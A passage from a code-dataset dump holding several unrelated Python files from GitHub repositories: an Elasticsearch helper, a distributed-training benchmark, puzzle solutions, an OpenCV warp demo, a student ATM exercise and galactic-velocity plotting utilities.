print(pessoa)","repo_name":"Syferim/Curso-Python3","sub_path":"aula80/aula80_0_mapeamento.py","file_name":"aula80_0_mapeamento.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11077668047","text":"from typing import Optional\n\nfrom elasticsearch import AsyncElasticsearch, NotFoundError\n\nfrom db.database import DatabaseInterface\nfrom models.paginate import Pagination\n\n# переменная хранит объект подключения после чего передачи\nes_conn: Optional[AsyncElasticsearch] = None\n\n\nasync def get_database_conn() -> Optional[AsyncElasticsearch]:\n \"\"\"Вернуть подключение к elasticsearch, если оно создано, иначе None.\"\"\"\n return es_conn\n\n\nclass ElasticMixin(DatabaseInterface):\n \"\"\"Реализация интерфейса базы данных и работающая через elasticsearch.\"\"\"\n\n def __init__(self, elastic: AsyncElasticsearch) -> None:\n self.elastic: AsyncElasticsearch = elastic\n self.index_name: str\n\n async def get_record_from_db(self, id_: str) -> Optional[dict]:\n try:\n doc = await self.elastic.get(self.index_name, id_)\n except NotFoundError:\n return None\n doc = doc[\"_source\"]\n\n return doc\n\n async def get_list_from_db(self, query: dict, sorter: list = []) -> list[dict]:\n result = await self.elastic.search(\n index=self.index_name, sort=sorter, body=query, request_timeout=90,\n )\n\n try:\n docs = result[\"hits\"][\"hits\"]\n except KeyError:\n docs = []\n\n return docs\n\n async def create_query(self, paginate: Optional[Pagination], filters) -> dict:\n \"\"\"Создать запрос в elaticsarch, основыванный на заднных фильтрах.\n Args:\n filters: Поля фильтрации.\n Returns:\n dict: составленный запрос.\n \"\"\"\n request_body = {\n \"size\": paginate.size,\n \"from\": (paginate.number - 1) * paginate.size,\n \"query\": {},\n }\n if isinstance(filters, str):\n request_body[\"query\"] = {\n \"multi_match\": {\n \"query\": f\"{filters}\",\n \"type\": \"phrase\",\n \"fields\": [\"*\"],\n }\n }\n else:\n request_body[\"query\"] = {\"bool\": {\"must\": []}}\n for filter_ in filters:\n if filter_[1]:\n request_body[\"query\"][\"bool\"][\"must\"].append(\n {\"match_phrase\": {f\"{filter_[0]}\": f\"{filter_[1]}\"}}\n )\n\n return request_body\n\n async def create_sorter(self, sort: str = \"\") -> list:\n \"\"\"Преобразуем параметр сортировки к нужном формате.\n Args:\n sort: Поле сортировки.\n Returns:\n list: список полей сортировки.\n \"\"\"\n if not sort:\n return []\n direct = \"DESC\" if sort.startswith(\"-\") else \"ASC\"\n\n return [f\"{sort.replace('-', '')}:{direct}\"]\n","repo_name":"mburdonos/flask_auth","sub_path":"src/db/elastic.py","file_name":"elastic.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22448919512","text":"from __future__ import absolute_import, division, print_function\n\nimport argparse\nimport os\nimport numpy as np\nimport timeit\n\nimport tensorflow as tf\nimport byteps.tensorflow.keras as bps\nfrom tensorflow.keras import applications\n\ntf.compat.v1.disable_eager_execution()\n\n# Benchmark settings\nparser = argparse.ArgumentParser(description='TensorFlow Synthetic Benchmark',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument('--fp16-allreduce', action='store_true', default=False,\n help='use fp16 compression during allreduce')\n\nparser.add_argument('--model', type=str, default='ResNet50',\n help='model to benchmark')\nparser.add_argument('--batch-size', type=int, default=32,\n help='input batch size')\n\nparser.add_argument('--num-warmup-batches', type=int, default=10,\n help='number of warm-up batches that don\\'t count towards benchmark')\nparser.add_argument('--num-batches-per-iter', type=int, default=10,\n help='number of batches per benchmark iteration')\nparser.add_argument('--num-iters', type=int, default=10,\n help='number of benchmark iterations')\n\nparser.add_argument('--no-cuda', action='store_true', default=False,\n help='disables CUDA training')\n\nargs = parser.parse_args()\nargs.cuda = not args.no_cuda\n\nbps.init()\n\n# pin GPU to be used to process local rank (one GPU per process)\nif args.cuda:\n gpus = tf.config.experimental.list_physical_devices('GPU')\n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n if gpus:\n tf.config.experimental.set_visible_devices(gpus[bps.local_rank()], 'GPU')\nelse:\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\n\ndata = tf.random.uniform([args.batch_size, 224, 224, 3])\ntarget = tf.random.uniform([args.batch_size, 1], minval=0, maxval=999, dtype=tf.int64)\n\ncallbacks = [\n # BytePS: broadcast initial variable states from rank 0 to all other processes.\n # This is necessary to ensure consistent initialization of all workers when\n # training is started with random weights or restored from a checkpoint.\n bps.callbacks.BroadcastGlobalVariablesCallback(0),\n]\n# Set up standard model.\nmodel = getattr(applications, args.model)(weights=None)\nopt = tf.keras.optimizers.Adam(0.01)\nopt = tf.keras.mixed_precision.experimental.LossScaleOptimizer(opt, loss_scale=\"dynamic\")\nopt = bps.DistributedOptimizer(opt)\n\nmodel.compile(loss=tf.keras.losses.categorical_crossentropy,\n optimizer=opt,\n metrics=['accuracy', 'top_k_categorical_accuracy'],\n experimental_run_tf_function=False)\nmodel.fit(data, target, epochs=10, steps_per_epoch=16, callbacks=callbacks)\n\ntest_loss, test_acc, test_topk = model.evaluate(data, target, verbose=2, steps=16)\nprint('\\nTest accuracy:', test_acc)\n","repo_name":"bytedance/byteps","sub_path":"example/keras/keras_synthetic_benchmark_tf2.py","file_name":"keras_synthetic_benchmark_tf2.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":3517,"dataset":"github-code","pt":"3"} +{"seq_id":"74893037521","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nAdvent of Code 2020 - Day 9 - Challenge 1\nhttps://adventofcode.com/2020/day/9\n\nSolution: 257342611\n\"\"\"\n\n__author__ = \"Filippo Corradino\"\n__email__ = \"filippo.corradino@gmail.com\"\n\n\ndef find_invalid(xmas, preamble):\n for i, value in enumerate(xmas[preamble:]):\n pool = set(xmas[i:i+preamble]) # \"preamble\" items before current value\n if all((value - x not in pool) for x in pool):\n return value\n raise RuntimeError(\"Didn't find any invalid number\")\n\n\ndef main(ifile='inputs/day_09_input.txt', preamble=25):\n with open(ifile) as file:\n xmas = [int(line) for line in file]\n value = find_invalid(xmas, preamble)\n print(f\"\\nFirst value to break the XMAS rule: {value}\\n\")\n return value\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"filippocorradino/advent_of_code_2020","sub_path":"day09_1.py","file_name":"day09_1.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"44758386021","text":"import os\nimport nlp\nimport json\nimport random\nimport datetime\nimport tokenizers\nimport numpy as np\nimport transformers\nimport pandas as pd\nimport tensorflow as tf\nimport plotly.express as px\nimport matplotlib.pyplot as plt\nfrom sklearn.utils import shuffle\n\n\ndef getUnbatchedDataset(trainDataSet, modelName, maxLength=64):\n \n if type(trainDataSet) == list:\n trainDataSet = {k: None for k in trainDataSet}\n \n trainDataSet = {k: v for k, v in trainDataSet.items() if k in raw_ds_mapping} \n \n tokenizer = transformers.AutoTokenizer.from_pretrained(modelName, use_fast=True)\n \n # This is a list of generators\n raw_datasets = [get_raw_dataset(x) for x in trainDataSet]\n \n nb_examples = 0\n\n labels = [] \n sentence_pairs = []\n \n for name in trainDataSet:\n raw_ds = get_raw_dataset(name)\n nb_examples_to_use = raw_ds_mapping[name][2]\n \n if trainDataSet[name]:\n nb_examples_to_use = min(trainDataSet[name], nb_examples_to_use)\n \n nb_examples += nb_examples_to_use\n \n n = 0\n \n for x in raw_ds:\n sentence_pairs.append((x['premise'], x['hypothesis']))\n labels.append(x['label'])\n n += 1\n if n >= nb_examples_to_use:\n break\n\n # `transformers.tokenization_utils_base.BatchEncoding` object -> `dict`\n r = dict(tokenizer.batch_encode_plus(batch_text_or_text_pairs = sentence_pairs, max_length = maxLength, padding = 'max_length', truncation = True))\n\n # This is very slow\n dataset = tf.data.Dataset.from_tensor_slices((r, labels))\n\n return dataset, nb_examples\n\n\ndef getBatchedTrainingDataset(dataset, nb_examples, batch_size = 16, shuffleBufferSize = 1, repeat = False):\n \n if repeat:\n dataset = dataset.repeat()\n \n if not shuffle_buffer_size:\n shuffle_buffer_size = nb_examples\n\n dataset = dataset.shuffle(shuffle_buffer_size)\n \n dataset = dataset.batch(batch_size, drop_remainder=True)\n \n dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\n \n return dataset\n\n\ndef getPredictionDataset(dataset, batch_size = 16):\n dataset = dataset.batch(batch_size, drop_remainder=False)\n dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\n \n return dataset\n","repo_name":"MortarDefender/NLP-Recognizing-Textual-Entailment","sub_path":"src/dataSetUtils.py","file_name":"dataSetUtils.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32711820893","text":"\"\"\"\r\nWARP: In this we can be able to extract the OBJECT from the images\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\nimg = cv2.imread('card.jpeg')\r\nwidth, height = 250, 350\r\npts1 = np.float32([[234, 60], [341, 53], [254, 213], [367, 203]])\r\npts2 = np.float32([[0, 0], [width, 0], [0, height], [width, height]])\r\n\r\nmatrix = cv2.getPerspectiveTransform(pts1, pts2)\r\nimgOutput = cv2.warpPerspective(img, matrix, (width, height))\r\ncv2.imshow('card Image', img)\r\ncv2.imshow('card Output', imgOutput)\r\ncv2.waitKey(0)\r\n\r\n","repo_name":"Franky-Saxena/Face-Recognition-OPENCV","sub_path":"warp.py","file_name":"warp.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5840316056","text":"\nclass Cliente:\n User = [\n [4386265817658813,\"Marcos Antonio\",2578,10000.00,\"001-0482267-5\",\"Los Molinos, Sto. Do. Este\",\"05/07/1999\"],\n [4706622888055985,\"José Hernández\",9314,45000.00,\"038-3215463-8\",\"Alma rosa I, Sto. Do. Este\",\"03/11/1995\"],\n [4894380501711011,\"Diego Peralta\",2427,150000.00,\"402-1933423-7\",\"Los Mameyes, Sto. Do. Este\",\"12/08/2002\"],\n [4134586712345568,\"Elvis Guillermo\",2427,300.00,\"402-2257713-1\",\"Manoguayabo, Sto. Do. Sur\",\"31/12/2001\"]]\n cuenta_suspendidas = [User[0],User[3]]\n\nclientes = Cliente.User\nsuspendidas = Cliente.cuenta_suspendidas\n#----------------------------------------------------------------------------------------------------------\ndef info():\n print(\"\\n----------------------------------------------\\n\")\n print(\"Codigo usuario =\", clientes.index(usuario))\n print(\"Cuenta:\",usuario[0])\n print(\"Balance:\",usuario[3])\n print(\"Nombre:\",usuario[1])\n print(\"Cedula:\",usuario[4])\n print(\"Direccion:\",usuario[5])\n print(\"Fecha de nacimiento:\",usuario[6])\n#----------------------------------------------------------------------------------------------------------\ndef informacion_cuenta():\n if not usuario in suspendidas:\n info()\n else:\n info()\n#----------------------------------------------------------------------------------------------------------\ndef depositar():\n monto = float(input(\"\\nDigite el monto a depositar: \"))\n usuario[3] += monto\n print(\"\\nSu nuevo balance es: \")\n print(usuario[3])\n#---------------------------------------------------------------------------------------------------------- \ndef retirar():\n monto = float(input(\"\\nDigite el monto a retirar: \"))\n if monto > usuario[3]:\n print(\"\\nNo tienes fondos suficientes\")\n else:\n print(\"\\nMonto retirado: \",monto)\n usuario[3]= usuario[3] - monto\n print(\"\\nSu nuevo balance es: \")\n print(usuario[3]) \n#----------------------------------------------------------------------------------------------------------\ndef Banco():\n global usuario\n error = 0\n print(\"\\n-----------------------------------------------------------------\")\n print (\"\\n..:Bienvenido al banco internacional YourMoneyISafe\")\n \n while True: \n cuenta = int(input(\"\\nIngrese el numero de su targeta o (0 PARA FINALIZAR):\"))\n if not cuenta == 0:\n for k in range (len(clientes)):\n if cuenta == clientes[k][0]:\n contraseña = int(input(\"\\nIngrese su contraseña:\"))\n if contraseña == clientes[k][2]:\n print(\"\\n--------------------------------------------\")\n print(\"| Bienvenido \", clientes[k][1],\" |\")\n print(\"|__________________________________________|\")\n print(\"| 1. Informacion de la cuenta |\")\n print(\"| 2. Deposito |\")\n print(\"| 3. Retiro de efectivo |\")\n print(\"| 4. Cancelar |\")\n print(\"--------------------------------------------\\n\")\n opcion = int(input(\"\\nDigite su opción: \"))\n if not opcion <1 and cuenta >4:\n if opcion == 1:\n usuario = clientes[k]\n informacion_cuenta()\n if opcion == 2:\n usuario = clientes[k]\n if not usuario in suspendidas:\n depositar()\n break;\n else: \n print(\"\\n Lo sentimos, su cuenta esta inhabilitada por favor acuda al centro de atencion mas cercano\")\n if opcion == 3:\n usuario = clientes[k]\n if not usuario in suspendidas:\n retirar()\n break;\n else: \n print(\"\\n Lo sentimos, su cuenta esta inhabilitada por favor acuda al centro de atencion mas cercano\") \n if opcion == 4:\n print(\"Has finalizado el programa\")\n break;\n else:\n print(\"no has ingresado ninguna de las opciones\")\n else: \n print(\"\\nContraseña incorrecta\")\n break; \n elif cuenta != clientes[0][0] and cuenta != clientes[1][0] and cuenta != clientes[2][0] :\n error +=1\n if error == 4:\n print(\"no hay cuenta asociada a ese codigo\")\n error = 0 \n if cuenta == 0:\n print(\"Has finalizado el programa\")\n break;\n\nBanco()","repo_name":"10GO-dev/Intro_Programacion","sub_path":"Ejercicio_en_clase_para_hoy.py","file_name":"Ejercicio_en_clase_para_hoy.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70438946322","text":"from collections import deque\n\nkDirection = [[-1, -2], [-2, -1], [-2, 1], [-1, 2], [1, 2], [2, 1], [2, -1], [1, -2]]\n\ndef BFS(startX, startY, endX, endY, visited):\n que = deque()\n que.append([startX, startY, 0])\n visited[startX][startY] = 1\n while que:\n cx, cy, cc = que.popleft()\n if cx == endX and cy == endY:\n print(cc)\n break\n for i in range(len(kDirection)):\n nx = cx + kDirection[i][0]\n ny = cy + kDirection[i][1]\n if -1 < nx < L and -1 < ny < L and visited[nx][ny] == 0:\n visited[nx][ny] = 1\n que.append([nx, ny, cc + 1])\n\nN = int(input())\n\nfor _ in range(N):\n L = int(input())\n visited = [[0] * L for _ in range(L)]\n x, y = map(int, input().split())\n targetX, targetY = map(int, input().split())\n BFS(x, y, targetX, targetY, visited)","repo_name":"tomxoghks789/pyAlgo","sub_path":"BFS/나이트의 이동.py","file_name":"나이트의 이동.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32200422372","text":"from matplotlib.ticker import FormatStrFormatter\nfrom matplotlib.ticker import StrMethodFormatter\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport matplotlib.cm as cm\nimport numpy as np\nimport astropy\nimport pandas as pd\nfrom data_analysis import generate_vector_mesh\nfrom astropy.visualization import LogStretch\nfrom astropy.visualization.mpl_normalize import ImageNormalize\n\n'''\nA simple histogram displaying the distribution of entries along the galactic plane.\nInput parameters:\n galcen - SkyCoord object in galactocentric frame\n'''\ndef distribution_hist(galcen):\n\n fig = plt.figure(figsize=(10, 10))\n\n plt.hist(-galcen.x.value, bins=np.linspace(-10000, 10000, 32))\n plt.xlabel('$x$ [{0:latex_inline}]'.format(galcen.z.unit), fontdict={'fontsize': 18});\n plt.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(0,0))\n plt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\n\n plt.ylabel('Count', fontdict={'fontsize': 18});\n plt.grid()\n plt.rcParams[\"patch.force_edgecolor\"] = True\n plt.title(\"Distribution by Distance\", pad=20, fontdict={'fontsize': 20})\n\n plt.show()\n\n'''\nA 2D histogram to depict point source density in different regions using 2D bins.\nUsing this to replace the currently broken 'point_density' plot.\n\n'''\ndef point_density_histogram(galcen, vmax, bin_start = -16000, bin_end = 16000, n_bins = 200):\n\n # Check if data is in DataFrame or Astropy SkyCoords object\n if isinstance(galcen, pd.DataFrame):\n x_coord = [-x for x in galcen.x]\n y_coord = [y for y in galcen.y]\n else:\n x_coord = [-x for x in galcen.x.value]\n y_coord = [y for y in galcen.y.value]\n\n norm_hist2d = ImageNormalize(vmin=0., vmax=vmax, stretch=LogStretch())\n\n fig = plt.figure(figsize=(10, 10))\n\n plt.hist2d(x_coord, y_coord, bins=np.linspace(bin_start, bin_end, n_bins), norm = norm_hist2d)\n\n plt.xlabel('x [pc]', fontsize=15)\n plt.ylabel('y [pc]', fontsize=15)\n plt.title(\"2D Histograms of Data Sources\", pad=20, fontdict={'fontsize': 20})\n plt.xlim(bin_start, bin_end)\n plt.ylim(bin_start, bin_end)\n plt.grid()\n\n cbar = plt.colorbar()\n cbar.ax.set_ylabel('Number of stars in bin')\n\n plt.show()\n\ndef display_values(XX, YY, H, mode = None):\n \"\"\"A function that displays the specific numerical values inside each bin.\n\n Args:\n XX (array): Bin boundaries in the x-axis.\n YY (array): Bin boundaries in the y-axis.\n H (asarray): The values inside the bins.\n mode (str, optional): The statistic used in the bin. Defaults to None.\n \"\"\"\n\n\n for i in range(YY.shape[0]-1):\n for j in range(XX.shape[1]-1):\n\n if mode != 'count':\n txt = plt.text((XX[0][j+1] + XX[0][j])/2, (YY.T[0][i+1] + YY.T[0][i])/2, '%.2f' % H.T[i, j],\n horizontalalignment='center',\n verticalalignment='center',\n backgroundcolor='w')\n\n else:\n txt = plt.text((XX[0][j+1] + XX[0][j])/2, (YY.T[0][i+1] + YY.T[0][i])/2, '%.0f' % H.T[i, j],\n horizontalalignment='center',\n verticalalignment='center', backgroundcolor='w')\n\n'''\nA plot which enables the user to see the bins created by the 'bin_data' functions in the\ndata analysis module. It takes in the histogram data and does a colormesh with colours\nmapped to the value inside the 2D bin.\n'''\ndef display_bins(bin_collection, projection_parameter, mode = 'mean', showBinValues = True):\n\n parameter = projection_parameter\n\n XX, YY = bin_collection.bin_boundaries[0:2]\n\n values = bin_collection.CalculateValues(parameter, mode)\n\n fig = plt.figure(figsize = (10,10))\n ax1=plt.subplot(111)\n plot1 = ax1.pcolormesh(XX, YY, values.T)\n\n if(showBinValues):\n display_values(XX, YY, values)\n\n cbar = plt.colorbar(plot1,ax=ax1,\n pad = .015,\n aspect=10,\n label='2D Bins Velocity V{0}[{1}]'.format(parameter, 'km/s'))\n\n plt.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(0,0))\n plt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\n\n ax1.set_xlabel('$x$ [{0:latex_inline}]'.format(astropy.units.core.Unit('pc')), fontdict={'fontsize': 18})\n ax1.set_ylabel('$y$ [{0:latex_inline}]'.format(astropy.units.core.Unit('pc')), fontdict={'fontsize': 18})\n\n plt.title(\"2D Bins Velocity V{0}\".format(parameter), pad=20, fontdict={'fontsize': 20})\n\n plt.show()\n\n\n\ndef plot_collapsed_bins(bin_collection, projection_parameter, showBinValues = True, mode = 'mean'):\n \"\"\"A plot to display the bins collapsed along the angular position coordinate phi.\n\n Args:\n bin_collection (BinCollection obj): Generated BinCollectino object.\n projection_parameter (str): The physical parameter to be observed.\n showBinValues (bool, optional): Shows numerical values in bins. Defaults to True.\n mode (str, optional): The statistic used on the parameter. Defaults to 'mean'.\n \"\"\"\n\n parameter = projection_parameter\n\n XX, YY = bin_collection.bin_boundaries[0:2]\n\n values = bin_collection.CalculateValues(parameter, mode = mode)\n\n if values.dtype == 'object':\n values = values.astype('float64')\n\n fig = plt.figure(figsize = (20,10))\n ax1=plt.subplot(111)\n plot1 = ax1.pcolormesh(XX,YY,values.T)\n\n if(showBinValues):\n display_values(XX, YY, values, mode)\n\n # Fix unit displaying later on!\n #cbar = plt.colorbar(plot1,ax=ax1,\n #pad = .015,\n #aspect=20,\n #label='R-Z Bins {0} [{1}]'.format(parameter, 'a.u.'))\n\n\n if(mode == 'MLE_std' or mode == 'MLE_mu'):\n projection_parameter = 'v_phi'\n\n cbar = plt.colorbar(plot1,ax=ax1,\n pad = .015,\n aspect = 20,\n label = '{0} {1}'.format(projection_parameter, mode))\n\n plt.xticks(XX[0])\n plt.yticks(YY.T[0])\n\n\n #plt.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(0,0))\n #plt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\n #ax1.set_xlabel('$r$ [{0:latex_inline}]'.format(astropy.units.core.Unit('pc')), fontdict={'fontsize': 18})\n #ax1.set_ylabel('$z$ [{0:latex_inline}]'.format(astropy.units.core.Unit('pc')), fontdict={'fontsize': 18})\n\n\n plt.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(3,3))\n plt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(3,3))\n\n ax1.set_xlabel('r [pc]' , fontdict={'fontsize': 18})\n ax1.set_ylabel('z [pc]', fontdict={'fontsize': 18})\n\n\n plt.title(\"Collapsed Bins in r-z Plane\", pad=20, fontdict={'fontsize': 20})\n\n arrowed_spines(fig, ax1)\n plt.show()\n\n\ndef Velocity_Field_Imshow(bin_collection,\n title_string = \"\",\n arg_notes=\"\",\n interpolation_type = \"gaussian\",\n radii = [0],\n display_arrows = False,\n plot_circles=False,\n save = False):\n \"\"\"Creates a velocity heatmap from binned data\n\n Args:\n bin_collection (BinCollection): Binned data returned from the 'bin_data' function in 'data_analysis'\n title_string (str, optional): The title of the plot. Defaults to \"\".\n arg_notes (str, optional): Subtitle of the plot. Defaults to \"\".\n interpolation_type(str, optional): Set the interpolation of the bin values. Defaults to \"gaussian\".\n radii (list, optional): A list of concentric circle radii which is plotted if 'plot_circles' is set to True. Defaults to [0].\n display_arrows (bool, optional): If True, plots the velocity vector in each bin. Defaults to False.\n plot_circles (bool, optional): If True, plots concentric circles around the Galactic centre. Defaults to False.\n save (bool, optional): If True, saves the figure to disk in '.png' using the 'title_string' as the file name. Defaults to False.\n \"\"\"\n\n\n H = bin_collection.CalculateValues('v_x')\n H2 = bin_collection.CalculateValues('v_y')\n\n XX = bin_collection.bin_boundaries[0]\n YY = bin_collection.bin_boundaries[1]\n\n\n\n\n # Gets the vector coordinates\n VEC_XX, VEC_YY = generate_vector_mesh(bin_collection.bin_boundaries[0], bin_collection.bin_boundaries[1])\n\n fig, ax = plt.subplots(figsize = (10,10))\n ax.set_xlabel(r'$x$ [{0:latex_inline}]'.format(astropy.units.core.Unit('pc')), fontdict={'fontsize': 15}, labelpad = 25)\n ax.set_ylabel(r'$y$ [{0:latex_inline}]'.format(astropy.units.core.Unit('pc')), fontdict={'fontsize': 15}, labelpad = 25)\n\n plt.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(0,0))\n plt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\n\n # Gives the hypotenuse of vectors\n M = np.hypot(H.T, H2.T)\n\n BIN_X_EDGES = bin_collection.bin_boundaries[0][0]\n BIN_Y_EDGES = bin_collection.bin_boundaries[1].T[0]\n\n dx = (BIN_X_EDGES[0]-BIN_X_EDGES[1])/2.\n dy = (BIN_Y_EDGES[0]-BIN_Y_EDGES[1])/2.\n extent = [BIN_X_EDGES[0], BIN_X_EDGES[-1], BIN_Y_EDGES[0], BIN_Y_EDGES[-1]]\n\n plt.xticks(XX[0])\n plt.yticks(YY.T[0])\n\n\n c = plt.imshow(M, extent = extent, interpolation = interpolation_type, cmap='jet')\n\n if(display_arrows):\n # The quiver plot with normalised vector lengths\n q = ax.quiver(VEC_XX, VEC_YY, H.T, H2.T, M, cmap=plt.cm.magma_r)\n\n\n ax.plot(0, 0, \"x\", color='red')\n ax.plot(-8178, 0, \"*\", markersize=20, color='red')\n\n plt.title(title_string, pad = 45, fontdict={'fontsize': 20})\n plt.suptitle(arg_notes, y=0.93, fontsize=15)\n\n cbar = plt.colorbar(c, ax=ax, pad = 0.05)\n cbar.set_label(label ='Velocity in bin [km/s]', labelpad= 30, size = 15)\n\n plt.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(0,0))\n plt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\n\n\n # Plot Circles\n if(plot_circles):\n angle = np.linspace( 0 , 2 * np.pi , 150 )\n\n for i, radius in enumerate(radii):\n\n radius = radii[i]\n x = radius * np.cos( angle )\n y = radius * np.sin( angle )\n ax.plot( x, y , label='{0} pc'.format(radius))\n\n\n plt.legend(loc='upper left')\n plt.grid()\n\n current_cmap = mpl.cm.get_cmap('jet')\n print(current_cmap)\n current_cmap.set_bad(color='grey')\n\n if(save):\n plt.savefig(title_string +'.png', dpi=300, format='png')\n\n\n'''\nGenerates a velocity vector field from binned data.\nInput parameters:\n binned_dict - A dictionary containing all requisite data for displaying the vector field\n'''\ndef generate_velocity_vector_map(bin_collection):\n\n\n H = bin_collection.CalculateValues('v_x')\n H2 = bin_collection.CalculateValues('v_y')\n\n # Gets the vector coordinates\n VEC_XX, VEC_YY = generate_vector_mesh(bin_collection.bin_boundaries[0], bin_collection.bin_boundaries[1])\n\n fig, ax = plt.subplots(figsize = (7,7))\n\n # Gives the hypotenuse of vectors\n M = np.hypot(H.T, H2.T)\n\n norm = mpl.colors.Normalize()\n norm.autoscale(M)\n cm = mpl.cm.jet\n\n sm = mpl.cm.ScalarMappable(cmap=cm, norm=norm)\n sm.set_array([])\n\n # The quiver plot with normalised vector lengths\n q = ax.quiver(VEC_XX, VEC_YY, H.T, H2.T, M, cmap=plt.cm.jet)\n\n plt.colorbar(sm)\n\n # Formats x-y axis in scientific notation\n plt.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(0,0))\n plt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\n\n # TODO: Implement for arbitrary limits\n plt.xlim(-20000,20000)\n plt.ylim(-20000,20000)\n\n ax.set_xlabel('$x$ [{0:latex_inline}]'.format(astropy.units.core.Unit('pc')), fontdict={'fontsize': 18})\n ax.set_ylabel('$y$ [{0:latex_inline}]'.format(astropy.units.core.Unit('pc')), fontdict={'fontsize': 18})\n\n plt.grid()\n plt.show()\n\n'''\ndf - Imported data from CSV\n'''\ndef run_parameter_tests(df, parameter_list):\n\n from .data_analysis import transform_to_galcen, get_transformed_data\n\n # Generating Transformation With Astropy\n galcen_astropy = transform_to_galcen(df)\n\n # Using our method\n galcen_my = get_transformed_data(df, include_cylindrical = True)\n\n\n for parameter in parameter_list:\n parameter_test_plot(galcen_astropy, galcen_my, parameter)\n\n\ndef parameter_test_plot(galcen_astropy, galcen_my, test_parameter):\n\n # Check if data is in DataFrame or Astropy SkyCoords object\n if isinstance(galcen_astropy, pd.DataFrame):\n x_coord = galcen_my[test_parameter]\n y_coord = galcen_astropy[test_parameter]\n else:\n x_coord = galcen_my[test_parameter]\n if(test_parameter == 'x'):\n y_coord = galcen_astropy.x.value\n\n elif(test_parameter == 'y'):\n y_coord = galcen_astropy.y.value\n\n elif(test_parameter == 'z'):\n y_coord = galcen_astropy.z.value\n\n elif(test_parameter == 'v_x'):\n y_coord = galcen_astropy.v_x.value\n\n elif(test_parameter == 'v_y'):\n y_coord = galcen_astropy.v_y.value\n\n elif(test_parameter == 'v_z'):\n y_coord = galcen_astropy.v_z.value\n\n\n # Right-hand transformation\n if(test_parameter == 'x' or test_parameter == 'v_x'):\n x_coord = [-x for x in x_coord]\n y_coord = [-y for y in y_coord]\n\n # Converstion to lists\n x_coord = [x for x in x_coord]\n y_coord = [y for y in y_coord]\n\n plot_label = \"Testing parameter: {0}\".format(test_parameter)\n\n plt.scatter(x_coord, y_coord, label=plot_label)\n plt.xlabel(\"Our values [{0}]\".format(test_parameter))\n plt.ylabel(\"Astropy values [{0}]\".format(test_parameter))\n plt.legend(loc='upper left')\n plt.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(0,0))\n plt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\n plt.grid()\n plt.title(\"Our transformation VS Astropy\", pad=20, fontdict={'fontsize': 20})\n plt.show()\n\n# Displays arrows on plot\ndef arrowed_spines(fig, ax):\n\n xmin, xmax = ax.get_xlim()\n ymin, ymax = ax.get_ylim()\n\n ax.spines[\"left\"].set_position((\"data\", xmin))\n ax.spines[\"right\"].set_position((\"data\", xmax))\n\n # removing the default axis on all sides:\n for side in ['bottom','top']:\n ax.spines[side].set_visible(False)\n\n # get width and height of axes object to compute\n # matching arrowhead length and width\n dps = fig.dpi_scale_trans.inverted()\n bbox = ax.get_window_extent().transformed(dps)\n width, height = bbox.width, bbox.height\n\n # manual arrowhead width and length\n hw = 1./30.*(ymax-ymin)\n hl = 1./30.*(xmax-xmin)\n lw = 1 # axis line width\n ohg = 0 # arrow overhang\n\n # compute matching arrowhead length and width\n yhw = hw/(ymax-ymin)*(xmax-xmin)* height/width\n yhl = hl/(xmax-xmin)*(ymax-ymin)* width/height\n\n # draw x and y axis\n ax.arrow(xmin, 0., xmax-xmin, 0., fc='black', ec='black', lw = lw,\n head_width=hw, head_length=hl, overhang = ohg,\n length_includes_head= True, clip_on = False)\n\n ax.arrow(xmin, 0, 0., (ymax-ymin)/2, fc='k', ec='k', lw = lw,\n head_width=yhw, head_length=yhl, overhang = ohg,\n length_includes_head= True, clip_on = False)\n\n ax.arrow(xmin, 0, 0., (ymin-ymax)/2, fc='k', ec='k', lw = lw,\n head_width=yhw, head_length=yhl, overhang = ohg,\n length_includes_head= True, clip_on = False)\n\ndef display_polar_coordinates(phi, r):\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='polar')\n c = ax.scatter(phi, r, cmap='hsv', alpha=0.5)\n\n plt.title(\"Polar Coordinates\", pad=20, fontdict={'fontsize': 20})\n plt.show()\n\n 